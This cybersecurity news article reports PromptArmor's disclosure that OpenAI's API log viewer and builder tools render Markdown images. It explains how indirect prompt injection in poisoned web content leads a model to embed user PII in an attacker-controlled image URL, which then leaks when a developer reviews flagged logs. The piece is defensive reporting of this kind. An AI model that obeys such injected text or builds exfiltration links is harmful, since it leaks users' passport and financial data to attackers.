The Log Viewer Trap: How OpenAI’s Dashboard Can Leak Your Secrets
Envision a scenario where your chatbot functions ostensibly as intended, preemptively suppressing a hazardous response, yet a data breach transpires subsequently in the most unanticipated of locales—the developer’s log viewer. Specialists from PromptArmor have elucidated such a contingency, asserting that OpenAI’s log viewer for APIs may serve as an exfiltration point for confidential intelligence due to the specific manner in which the interface renders Markdown imagery.
The essence of this incursion resides in indirect prompt injection. Rather than assaulting the application directly, an adversary “poisons” an external data source utilized by the AI—such as a webpage or third-party content. When a user queries the assistant, the embedded directive compels the model to synthesize a response containing a Markdown image. The source URL for this image points to an attacker-controlled domain, while the URL parameters are dynamically populated with sensitive data from the current context—essentially formatted as attacker.com/img.png?data=..., where the ellipsis is replaced by PII (Personally Identifiable Information), internal documents, or fiscal details.
In many robust applications, such a response never reaches the end-user. Developers frequently employ defensive measures, such as “judge” models to flag suspicious content, Markdown sanitization, or content security policies (CSP) that enforce plain-text output. In the case study provided, the malicious response was indeed successfully intercepted and failed to render within the interface of a KYC (Know Your Customer) service. The vulnerability manifests during the subsequent phase: when the flagged dialogue is queued for manual review and a developer accesses it via the OpenAI dashboard.
The log interfaces for API “responses” and “conversations” support Markdown rendering by default. If an entry contains a Markdown image, the browser attempts to retrieve it automatically. At this juncture, data exfiltration occurs: a request is dispatched to the attacker’s server via the pre-constructed link, carrying the “stitched-in” secret data. The domain owner merely needs to inspect their server logs to harvest the parameters added by the model, potentially encompassing passport details or financial telemetry.
Notably, even if an application meticulously scrubs imagery from Markdown, users often designate anomalous or broken responses as “poor” via feedback mechanisms. Such messages are frequently funneled to moderation queues for analysis—the precise environment where a developer’s log-viewing activity triggers the image loading. The researchers cite Perplexity as an example, where rigorous sanitization might leave a fragmented response that provokes a negative user rating, thereby inviting a manual audit.
The investigation further contends that this vulnerability transcends log screens, affecting several OpenAI environments where tool previewing and testing occur, including Agent Builder, Assistant Builder, and Chat Builder, as well as the ChatKit Playground. All of these purportedly render insecure Markdown images without sufficient constraints.
PromptArmor submitted their findings via BugCrowd, engaging in a series of clarifications from November 17 to December 4, 2025. Ultimately, the case was shuttered with a status of “Not Applicable.” Consequently, the researchers opted for public disclosure to alert organizations utilizing OpenAI APIs. In such a model, practical defense extends beyond application-side filters; it necessitates organizational safeguards, such as restricting log access, auditing flagged dialogues within isolated environments devoid of external connectivity, and maintaining a healthy skepticism toward any rendered Markdown, particularly when the model has interfaced with external data streams.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.